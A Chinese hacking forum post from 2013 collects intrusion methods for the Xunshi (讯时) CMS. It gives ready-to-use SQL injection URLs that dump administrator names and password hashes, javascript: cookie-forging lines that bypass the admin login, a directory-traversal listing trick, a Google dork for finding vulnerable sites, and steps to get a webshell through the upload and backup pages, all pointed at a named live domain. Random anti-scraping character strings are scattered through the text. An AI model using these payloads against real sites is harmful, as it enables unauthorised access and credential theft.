找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2704|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
. t* |8 S8 k. l! W4 n2 Q
. ?- o% ^* e. x  z在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)+ d: O# i3 F4 i2 _

$ U, ]0 v; i& t3 r以下本文总结来自黑防去年第9期杂志上的内容...
3 c) v! [8 |3 u+ p( F( ~1 R$ z2 g. s7 C, b3 }' @: Q
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%# v/ D: U* D( w. o! q& c
' o, m, w; d0 z
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
( m- K% X5 S  l  l+ U2 S, \, ~* t
5 _& B, D' e  u! W) j: ]% y记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况" z# @  G$ N" M% Z
这里一个注入
3 o# F# B1 f1 o0 O8 z+ K3 y" W+ b1 @; D$ e' Y, s! e
效果如图:
/ L( s+ w) k8 W) e' G+ B- r8 m
, f& O% |4 C. C* m
0 S! p4 m: D( T7 V3 p
; R. {. ]! P; m' ^; Z2 y+ X" o6 W这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.; d+ l  e  Y4 B6 C; {# l
' K. }* U) \; `" ?* ]0 }
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
8 f+ H/ f( Z" \( b( p6 Q0 u, M$ n- E6 a
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));* n- o1 |' S( k4 B6 J
  X& v. b# b! k
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
0 ]6 Z  ^1 K& q- t7 N3 M2 T% X8 H: s* g
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞* h8 {  U/ N" t* a2 Z3 L8 t) J

  F& m+ f/ `& @它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以/ f1 W1 T) Q: u/ x8 y5 g. I% o
1 d- f6 J8 U/ }2 P
访问这页面来列目录..步骤如下:9 H6 \* K. _" ^

: C! A) P6 I0 B) L' Mjavascript:alert(document.cookie="admindj=1")
& e) p: J% D; h" i' B% w
! n: D; `0 z- b' Y( M: Z4 {http://www.political-security.co ... asp?id=46&dir=../..
3 e& A) B8 p9 q% V, A3 ]. B
1 z, H9 p- M5 f/ }7 v效果如图:
: ]4 i2 q  o" c' P
# l% J3 |- b- N* i. b
! A, ^! x3 B, ]9 K0 e3 d- J* z$ k6 M- s: t% v& O# [* q# Z' M" c
这样全站目录都能瞧了..找到后台目录..进去..
2 x9 |' {/ y3 z0 y( d2 C/ E1 E2 v1 Y4 z1 `- T% Z! u$ A+ d) E
那么进了后台怎么拿shell??上传--备份就ok了..
5 B- v' F1 R# P- I( A* p- d. |2 B: r5 `2 n$ O# }$ N# H
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..+ W0 T9 _8 X. g5 J; E, p2 V
* R- _( t) c% \9 I& }0 z6 O2 I4 f
这个我也碰到过一次..你都可以通过列目录来实现..
; m  P, Y. L* Z9 ]# U6 E  f9 F. c' J3 }& q1 D
javascript:alert(document.cookie="admindj=1")
6 D9 g, R5 I5 y! z7 W0 P* Q. o* I; I" q! v" u  p6 V4 Y; k1 Y
http://www.political-security.co ... p?action=BackupData
6 V8 f4 a! e1 Z- q, t& L
& e5 b: Q+ T$ M0 T4 c! X备份ok..
/ N5 E6 B6 d4 w$ ]) a9 M
5 ~7 m# l% f! {+ H5 S那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
. @6 q/ O8 ^1 I
( b9 }, S7 I8 C% E' w  G, h/ D" F* T在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下9 J7 `; Z" l8 n" L
- z) v' `7 C4 i. m- X) h& k5 _
然后访问此页面进行注入..步骤如下:
" Z  p6 ^& @  F1 Q; S9 S
, D) P  h  m9 E+ A, njavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
' \/ f( `7 K' o0 Q# K; D9 U$ g! D9 O  [
然后请求admin/admin_chk.asp页面
7 _7 f8 o) s' a% G2 y" b
9 F& I. p# w: M" A输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%8 A: m2 Z( \4 W6 t- c+ h* J
$ i' Y/ ?2 `" f& z% F
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
' O7 u& O8 h# \) F
( \6 u; \" V5 L+ ^) P效果如图所示:
, `! o4 N: A& V( Y6 x# P( w6 F& U1 b5 d8 M
  ?7 [2 L9 x7 w
( w; k/ x$ a; K3 m+ l0 w
讯时漏洞2
7 H$ H8 t% f/ f0 V, ^google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
- R" k3 |6 P. p) c& Y# \7 G
% i3 ?5 K  Y( O* a; \5 ?1、/admin/admin_news_pl_view.asp?id=1
2 x3 d& B" w. E9 q& c2 p7 G//id任意 填入以下语句) T7 i& L/ ^0 D! H* K7 U% P, R

; Q3 p: M5 k# o2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
, ^9 A* A- V2 W+ Y% y0 t  G. ~7 Q( `3 J / s1 N6 h; r3 H' M% p2 j3 @% \

) N, ?( K) n  h3 G8 g$ l7 z  r1 e$ h; U  q& `3 m
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
( Y6 I! p* f0 M% q, B% V) J6 d. d8 _5 B
) }& p3 D- \% v6 F+ \6 z0 F8 ~' ]1 `" V7 c, a3 g
( O/ J1 k1 F( Y  q5 |4 H# A
爆出管理员帐号和密码了
3 a2 i7 h% X# E4 I1 O8 k3 V( z
  [! I' T' ?+ M& v
. u: K; K5 {8 M' e0 d0 B5 z9 ~
6 [" U; J9 r( P: r, U4、cookies进后台9 R& Z. ~  m  j* Y0 i+ o, H% N

# W" b, b# w# N% tjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));% d8 d4 D* }  q7 [; \

0 Y7 a2 h9 ?7 Y# F0 K& L* ]" b% L% b* J; q

3 n+ w# C+ {* u' I5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
7 g- B2 f; R, I # P. t2 L/ }: v4 ]

9 p- V; S1 C+ a& H; h
" M( ^: S" a& J, e2 E. ^" Y# |" R6、后台有上传和备份取SHELL不难。
& w" L+ I+ [( f
/ `5 Z1 @3 h, X; N7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
* o$ |% U; x1 C: B
/ l! H. V- o0 i" g逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!0 P" F$ x$ q5 b5 S6 t, i

' @! V$ H) G- p  C' e0 o% L! r( [0 ~3 I

1 i: a: q8 I7 q# J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表